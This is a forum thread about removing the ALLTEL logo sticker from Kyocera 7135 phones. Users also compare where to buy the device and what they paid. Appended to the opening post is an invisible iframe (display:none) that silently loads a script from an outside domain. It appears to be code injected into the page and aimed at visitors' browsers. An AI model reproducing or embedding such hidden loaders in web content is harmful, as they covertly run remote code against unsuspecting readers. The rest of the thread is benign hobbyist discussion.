+ Reply to Thread

Getting rid of ALLTEL logo on case on the 7135

Has anyone tried removing the ALLTEL logo that is stuck on the inside of the phone? I am tempted to pull it off, and was wondering if the kyocera symbol is below it. YES, YES, my phone is vain. Let me know.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

You have the Alltel logo sticker because you walked into an Alltel store and bought it. Almost everyone else ordered their over the web via GetConnected.com and I believe those don't have an Alltel logo sticker. They just have Kyocera and 7135 on them. Yea, I'm glad that I won't have Alltel on mine! But then I had to pay much more than you.

I would guess that Kyo puts theirs under and then Alltel sticks theirs on top, but don't know for sure.
    ~'kito
    pdaPhoneHome Moderator

I too got mine from get connected so there is no external alltel symbol, but the phone start-up screen has alltel flash across the screen. This site has instructions on how to remove this, but I decided to keep it as a constant reminder that Verizon let me down in not getting this phone in their stores quicker.

I know it's a small victory (some might say petty), but it does make me feel better.

:p
    If at first you don't succeed, don't try sky diving.

Originally posted by Steve B.
    I too got mine from get connected so there is no external alltel symbol, but the phone start-up screen has alltel flash across the screen. This site has instructions on how to remove this, but I decided to keep it as a constant reminder that Verizon let me down in not getting this phone in their stores quicker.

I know it's a small victory (some might say petty), but it does make me feel better.

:p
    I'm sure that's really hurting Verizon, particularly each month when they receive your payment. :awink

I got mine directly from an Alltel store, and there is no Alltel logo anywhere on the case, other than the boot up logo. I wouldn't try to remove it if there WAS one, since I actually use alltel!

Richard

Alltel label on phone ???

Does your phone have the Alltel name on the metal plate when the flip is open ??

Mine has no name only 7135 written

I saw some pictures of phone with verizon . Im with Bell Mobility so im glad it is only written 7135

Marc-Andre

It seems that the non-contract ones from GetConnected don't have that, which I am very thankful for. But one guy here bought his at an actual Alltel store and got an Alltel logo stuck on his.

And let's not even talk about the huge-ass Verizon logo that will be on theirs!
    ~'kito
    pdaPhoneHome Moderator

darn them. Now I will be branded forever.. at least until 8135 arrives..
    iPhone therefore iAm.

You mean 8235.
    ~'kito
    pdaPhoneHome Moderator

pictures

Anyone have any pictures of the ALLTEL branded phone????

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

I removed the Alltel sticker, there is nothing underneath except for the blueish plastic. This plastic is the same color as the rest of the case. After removing the sticker, the phone looks great and it doesent appear like something is missing or looks like it should have been there.

I bought mine outright from Alltel and promptly removed the 7135 sticker. No VZW sticker on the front flip either.

Is it any cheaper to buy from Alltel, or is the $699 from GetConnected the best deal for someone (like me) that will activate with VZW?

If there's an Alltel store around you, it would probably be cheaper to buy from them. One guy walked in and bought one from an Alltel store for $639 + tax.

Would this be a possibility - call an Alltel store and ask if you can buy one from them and have them ship it to you? Tell them that you're vacationing and need it now.

For some dumb reason until I read this thread I have been walking around with an Alltel label on my beautiful 7135. After I took out a eyeglass screwdriver and very gently got under the label I discovered it was just that....a label that peeled right off. Actually I was kinda disappointed that I had waited that long to check this out. I figured it was some sort of polished metal of some kind but it just turned out to be an ordinary paper label. Now my 7135 doesn't belong to anybody but me! If anyone else out there has an Alltel label inside the flip don't be afraid to take it off. Just be gentle or you'll scratch what's underneath.
    ---dmiowa

I should locate sticker paper for my color printer and make my own little label for that area. I've seen decal paper on eBay, maybe I'll give that a shot one rainy afternoon...

7135 Sticker

??

Does anyone know how to get ahold of a Verizon sticker to replace the black "7135" label? Whoever put the sticker on my phone got it ever so slightly crooked.

There are other stickers in various pictures that look better.

Thomas

What sticker is on you phone... mine just says "7135"

Originally posted by Markito
    It seems that the non-contract ones from GetConnected don't have that, which I am very thankful for. But one guy here bought his at an actual Alltel store and got an Alltel logo stuck on his.

And let's not even talk about the huge-ass Verizon logo that will be on theirs!
    Just as a follow up, this is not necessarily the case. When I received a replacement phone from GetConnected (non-contract) it too had the ALLTEL label......

I leave it blank or use clings--see thread about removing VZ silkscreening on case.

Beth